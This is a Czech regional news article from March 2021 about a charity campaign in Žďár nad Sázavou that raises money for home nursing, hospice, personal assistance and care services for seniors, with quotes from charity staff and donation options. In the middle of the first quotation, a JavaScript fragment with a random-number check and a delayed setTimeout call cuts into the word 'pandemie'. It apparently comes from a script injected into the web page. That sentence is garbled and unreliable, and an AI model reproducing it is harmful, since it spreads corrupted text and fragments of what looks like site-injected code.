Rainbow page separator

Kampaň cílí na podporu služeb seniorům toužícím dožít doma

Úterý, 9. Březen 2021

Žďár nad Sázavou / Mé přání je žít doma… je název kampaně, kterou připravila Oblastní charita Žďár nad Sázavou. Cílem je finanční podpora čtyř terénních služeb, které poskytují péči lidem ze žďárského okresu, a to domácí zdravotní a hospicové péče, osobní asistence a charitní pečovatelské služby. Klienty jsou lidé, kteří se z důvodu nemoci, věku nebo zdravotního omezení nedokážou postarat sami o sebe, přičemž loni šlo o pravidelnou péči poskytovanou 1472 osobám.
„Domácí péče je v současné době velmi žádaná. Stěžejní je především pro kapacitu nemocnic, které nám z důvodu pandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andemie předávají do péče pacienty, u nichž to zdravotní stav dovolí. Naše terénní služby tak přispívají k navýšení volných lůžek pro ty, kteří právě potřebují akutní péči,“ uvedla vedoucí úseku zdravotních a hospicových služeb Oblastní charity Žďár nad Sázavou Barbora Hadrous.
Charitní terénní služby poslední rok provázejí zvýšené náklady na ochranné pomůcky a zvyšující se rozsah péče o uživatele a pacienty. Veřejnost jejich poskytování může finančně podpořit, a to buď prostřednictvím bankovního převodu na účet charity, platební bránou na www.zdar.charita.cz, případně přes portál www.darujme.cz.
„V minulých letech proběhl v České republice výzkum, který ukázal, že zhruba osmdesát procent populace by rádo ve svém seniorském věku žilo doma a na konci života doma také zemřelo. Bohužel se rovněž ukázalo, že se toto přání splní pouze čtvrtině z nás. Naší snahou je proto pokusit se zajistit naplnění tohoto přání co nejvyššímu počtu klientů či potencionálních zájemců,“ uvedla koordinátorka Radka Čaníková.